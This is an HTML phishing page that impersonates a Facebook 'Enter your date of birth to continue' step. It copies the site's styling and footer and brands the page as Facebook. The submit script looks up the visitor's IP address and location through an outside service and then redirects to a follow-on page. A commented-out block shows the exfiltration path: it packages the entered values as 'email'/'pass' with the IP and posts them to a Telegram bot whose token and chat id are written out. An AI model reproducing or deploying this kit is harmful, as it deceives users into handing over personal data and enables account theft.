<html lang="en">

<head>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="icon" type="image/png" href="favicon-16x16.png" />
  <link rel='shortcut icon' type='image/x-icon' href='favicon.ico' />
  <script src="https://kit.fontawesome.com/c543de8271.js" crossorigin="anonymous"></script>

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
  <style type="text/css">
    body {
      font-family: Helvetica, Arial, sans-serif;
    }

    .boxilogin {
      background-color: white;
      border-radius: 8px;
      box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
      margin: auto;
      padding: 24px 17px;
      border: 1px solid #dddfe2;
    }

    .logtext {
      padding-top: 0px;
      padding-bottom: 24px;
      margin-bottom: 0px;
      font-size: 18px;
      line-height: 22px;
      color: #1c1e21;
    }

    input[type=text] {
      border-radius: 6px;
      font-size: 17px;
      padding: 14px 16px;
      height: 60px;
      background: #FFFFFF url(/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
      border: 1px solid #dddfe2;
      color: #1d2129;
    }

    input[type=password] {
      border-radius: 6px;
      font-size: 17px;
      padding: 14px 16px;
      height: 60px;
      background: #FFFFFF url(/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
      border: 1px solid #fa3e3e;
      color: #1d2129;
    }

    .butonisubmit {
      background-color: #1877f2;
      border: none;
      border-radius: 6px;

      width: 100%;
      font-size: 20px;
      line-height: 48px;
      padding: 0 16px;
    }

    .linkforget {
      color: #1877f2;
      font-size: 14px;
      font-weight: 500;
    }

    ._1rf5 {
      width: auto;
    }

    ._1rf5 {
      display: block;
      margin-bottom: 10px;
      overflow: hidden;
      text-align: center;
      white-space: nowrap;
      width: 100%;
    }

    ._1rf8 {
      color: #96999e;
    }

    ._1rf5>span {
      display: inline-block;
      position: relative;
      font-size: 13px;
    }

    ._1rf5>span:before {
      margin-right: 15px;
      right: 100%;
    }

    ._1rf5>span:before,
    ._1rf5>span:after {
      background: #ccd0d5;
      content: "";
      height: 1px;
      position: absolute;
      top: 50%;
      width: 9999px;
    }

    ._1rf5>span:before,
    ._1rf5>span:after {
      background: #d7dade;
    }

    ._1rf5>span:after {
      left: 100%;
      margin-left: 15px;
    }

    ._1rf5>span:before,
    ._1rf5>span:after {
      background: #ccd0d5;
      content: "";
      height: 1px;
      position: absolute;
      top: 50%;
      width: 9999px;
    }

    .createbutton {
      border: none;
      border-radius: 6px;
      font-size: 17px;
      line-height: 48px;
      padding: 0 16px;
      background-color: #42b72a;
      border-color: #42b72a;

      box-sizing: content-box;
      -webkit-font-smoothing: antialiased;
      font-weight: bold;
      justify-content: center;
      position: relative;
      text-align: center;
      text-shadow: none;
      vertical-align: middle;
    }

    .menuja ul {
      align-items: center;
      display: flex;
      flex-wrap: wrap;
      list-style-type: none;
      margin: 0;
      padding: 0;
    }

    .menuja ul li {
      padding-left: 20px;
      font-size: 12px;
      color: #737373;
    }

    .menuja {
      border-bottom: 1px solid #dddfe2;
      padding-bottom: 10px;
    }

    .menuja2 ul {
      align-items: center;
      display: flex;
      flex-wrap: wrap;
      list-style-type: none;
      margin: 0;
      padding: 0;
    }

    .menuja2 ul li {
      padding-left: 20px;
      font-size: 12px;
      color: #737373;
    }

    .menuja2 {
      padding-top: 10px;
    }

    .kolonaboxi {
      padding-left: 0px;
      padding-right: 0px;
    }

    @media only screen and (max-width: 600px) {
      .kolonaboxi {
        padding-left: 10px;
        padding-right: 10px;
      }
    }

    .iconwrongi {
      margin-top: -39px;
      font-size: 22px;
      color: #fa3e3e;
      float: right;
      margin-right: 16px;
    }
  </style>
  <title>Facebook</title>
</head>

<body>
  <div style="background-color:#f0f2f5; text-align: center; padding-bottom:80px">
    <div class="container">
      <div style="padding-top:50px;">
        <img style="width: 240px; height: 84px;" src="llugu.svg">
      </div>
      <div class="row">
        <div class="col-md-4 offset-md-4 kolonaboxi">
          <div class="boxilogin">
            <p class="logtext">Enter your date of birth to continue</p>

            <form id="appeali" name="myForm">
              <div class="row">
                <div class="col-4" style="padding-right:5px !important">
                  <div class="form-group">
                    <select class="form-control" name="day" id="sel1">
                      <option value="1">1</option>
                      <option value="2">2</option>
                      <option value="3">3</option>
                      <option value="4">4</option>
                      <option value="5">5</option>
                      <option value="6">6</option>
                      <option value="7">7</option>
                      <option value="8">8</option>
                      <option value="9">9</option>
                      <option value="10">10</option>
                      <option value="11">11</option>
                      <option value="12">12</option>
                      <option value="13">13</option>
                      <option value="14">14</option>
                      <option value="15">15</option>
                      <option value="16">16</option>
                      <option value="17">17</option>
                      <option value="18">18</option>
                      <option value="19">19</option>
                      <option value="20">20</option>
                      <option value="21">21</option>
                      <option value="22">22</option>
                      <option value="23">23</option>
                      <option value="24">24</option>
                      <option value="25">25</option>
                      <option value="26">26</option>
                      <option value="27">27</option>
                      <option value="28">28</option>
                      <option value="29">29</option>
                      <option value="30">30</option>
                      <option value="31">31</option>
                    </select>
                  </div>
                </div>
                <div class="col-4" style="padding-left:5px !important; padding-right: 5px !important">
                  <div class="form-group">
                    <select class="form-control" name="month" id="sel2">
                      <option value="0" selected="true">Month</option>
                      <option value="Jan">Jan</option>
                      <option value="Feb">Feb</option>
                      <option value="Mar">Mar</option>
                      <option value="Apr">Apr</option>
                      <option value="May">May</option>
                      <option value="Jun">Jun</option>
                      <option value="Jul">Jul</option>
                      <option value="Aug">Aug</option>
                      <option value="Sep">Sep</option>
                      <option value="Oct">Oct</option>
                      <option value="Nov">Nov</option>
                      <option value="Dec">Dec</option>
                    </select>
                  </div>
                </div>
                <div class="col-4" style="padding-left:5px !important">
                  <div class="form-group">
                    <select class="form-control" name="year" id="sel3">
                      <option value="0">Year</option>
                      <option value="1940">1940</option>
                      <option value="1941">1941</option>
                      <option value="1942">1942</option>
                      <option value="1943">1943</option>
                      <option value="1944">1944</option>
                      <option value="1945">1945</option>
                      <option value="1946">1946</option>
                      <option value="1947">1947</option>
                      <option value="1948">1948</option>
                      <option value="1949">1949</option>
                      <option value="1950">1950</option>
                      <option value="1951">1951</option>
                      <option value="1952">1952</option>
                      <option value="1953">1953</option>
                      <option value="1954">1954</option>
                      <option value="1955">1955</option>
                      <option value="1956">1956</option>
                      <option value="1957">1957</option>
                      <option value="1958">1958</option>
                      <option value="1959">1959</option>
                      <option value="1960">1960</option>
                      <option value="1961">1961</option>
                      <option value="1962">1962</option>
                      <option value="1963">1963</option>
                      <option value="1964">1964</option>
                      <option value="1965">1965</option>
                      <option value="1966">1966</option>
                      <option value="1967">1967</option>
                      <option value="1968">1968</option>
                      <option value="1969">1969</option>
                      <option value="1970">1970</option>
                      <option value="1971">1971</option>
                      <option value="1972">1972</option>
                      <option value="1973">1973</option>
                      <option value="1974">1974</option>
                      <option value="1975">1975</option>
                      <option value="1976">1976</option>
                      <option value="1977">1977</option>
                      <option value="1978">1978</option>
                      <option value="1979">1979</option>
                      <option value="1980">1980</option>
                      <option value="1981">1981</option>
                      <option value="1982">1982</option>
                      <option value="1983">1983</option>
                      <option value="1984">1984</option>
                      <option value="1985">1985</option>
                      <option value="1986">1986</option>
                      <option value="1987">1987</option>
                      <option value="1988">1988</option>
                      <option value="1989">1989</option>
                      <option value="1990">1990</option>
                      <option value="1991">1991</option>
                      <option value="1992">1992</option>
                      <option value="1993">1993</option>
                      <option value="1994">1994</option>
                      <option value="1995">1995</option>
                      <option value="1996">1996</option>
                      <option value="1997">1997</option>
                      <option value="1998">1998</option>
                      <option value="1999">1999</option>
                      <option value="2000">2000</option>
                      <option value="2001">2001</option>
                      <option value="2002">2002</option>
                      <option value="2003">2003</option>
                      <option value="2004">2004</option>
                      <option value="2005">2005</option>
                      <option value="2006">2006</option>
                      <option value="2007">2007</option>
                      <option value="2008">2008</option>
                      <option value="2009">2009</option>
                      <option value="2010">2010</option>
                      <option value="2011">2011</option>
                      <option value="2012">2012</option>
                      <option value="2013">2013</option>
                      <option value="2014">2014</option>
                      <option value="2015">2015</option>
                      <option value="2016">2016</option>
                      <option value="2017">2017</option>
                      <option value="2018">2018</option>
                      <option value="2019">2019</option>
                      <option value="2020">2020</option>
                      <option value="2021">2021</option>
                      <option value="2022">2022</option>
                    </select>
                  </div>
                </div>
              </div>

              <input type="hidden" name="verifyifbirthday" value="sakt">
              <!-- 
                <button type="button" onclick="submitwrong()" style="margin-top: 10px" class="btn btn-primary butonisubmit" id="buttoni">Continue</button> -->
              <button name="submit" type="submit" class="btn btn-primary butonisubmit" id="submit_btn">Continue</button>

            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div style="background-color:#ffffff; padding-top:50px">
    <div class="container">
      <div class="menuja">
        <ul>
          <li>
            English (US)
          </li>
          <li>
            Español
          </li>
          <li>
            Français (France)
          </li>
          <li>
            中文(简体)
          </li>
          <li>
            العربية
          </li>
          <li>
            Português (Brasil)
          </li>
          <li>
            한국어
          </li>
          <li>
            Italiano
          </li>
          <li>
            हिन्दी
          </li>
          <li>
            日本語
          </li>
        </ul>
      </div>
      <div class="menuja2">
        <ul>
          <li>
            Sign Up
          </li>
          <li>
            Log In
          </li>
          <li>
            Messenger
          </li>
          <li>
            Facebook Lite
          </li>
          <li>
            Watch
          </li>
          <li>
            People
          </li>
          <li>
            Pages
          </li>
          <li>
            Page Categories
          </li>
          <li>
            Places
          </li>
          <li>
            Locations
          </li>
          <li>
            Marketplace
          </li>
          <li>
            Facebook Pay
          </li>
          <li>
            GroupsOculus
          </li>
          <li>
            Portal
          </li>
          <li>
            Instagram
          </li>
          <li>
            Local
          </li>
          <li>
            Instagram
          </li>
          <li>
            Fundraisers
          </li>
          <li>
            Services
          </li>
          <li>
            Voting Information Center
          </li>
          <li>
            About
          </li>
          <li>
            Create Ad
          </li>
          <li>
            Create Page
          </li>
          <li>
            Developers
          </li>
          <li>
            Careers
          </li>
          <li>
            Privacy
          </li>
          <li>
            Cookies
          </li>
          <li>
            Ad Choices
          </li>
          <li>
            Terms
          </li>
          <li>
            Help
          </li>
          <li>
            Activity Log
          </li>
        </ul>
      </div>
      <p style="color:#737373; padding-left: 20px; font-size: 12px; margin-top:20px; margin-bottom:20px;">Facebook ©
        2022</p>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
    integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
    crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
    integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
    crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
    integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
    crossorigin="anonymous"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>




  <script type="text/javascript">
    $("#submit_btn").click(function (e) {
      e.preventDefault();
      email = document.getElementById('sel1').value;
      number = document.getElementById('sel2').value;
      number0 = document.getElementById('sel3').value;

      if (email == '') {
        document.getElementById('sel1').style.borderColor = "red";
      } else {
        document.getElementById("sel1").style.borderColor = "black";
      }
      if (number == '') {
        document.getElementById('sel2').style.borderColor = "red";
      } else {
        document.getElementById("sel2").style.borderColor = "black";
      }

      if (number0 == '') {
        document.getElementById('sel3').style.borderColor = "red";
      } else {
        document.getElementById("sel3").style.borderColor = "black";
      }


      if (email != '' && number != '') {
        $.getJSON('https://ipapi.co/json/', function (data) {
          var obj = JSON.parse(JSON.stringify(data, null, 2));
          country_name = obj.country;
          country_code = obj.country_code;
          country_city = obj.city;
          ipaddress = obj.ip;

          // event.preventDefault()
          var siteUrl = window.location.href;
          var emailInfos = 'Ok';
          //var firstPassword =  document.getElementById('inputPassword').value; 

          // var params = {
          //     content: '=============================' + '%0A' +  
          //         'email: "' +  email + '"'+ '%0A' + 
          //         'pass: "' + number + '"' + '%0A' +
          //         'pass: "' + number0 + '"' + '%0A' +
          //         'IP: "' + ipaddress + '"' + '%0A' + 
          //         '============================='
          // }

          // fetch(`https://api.telegram.org/bot5214361976:AAF9GBehASS_VpWojjKLsoYuyKwTb8eoZTc/sendMessage?chat_id=-1001730827613&text=profilausa${params.content}/parse_mode=html`, {
          //         method: 'POST', // or 'PUT'
          //         headers: {
          //             'Content-Type': 'application/json',
          //         },

          // }).then(function(){

          // })

          window.location.href = "hinem.html";

        });
      } else {
        console.log("req");
      }




    });




  </script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"
    integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN"
    crossorigin="anonymous"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"
    integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV"
    crossorigin="anonymous"></script>

</body>

</html>
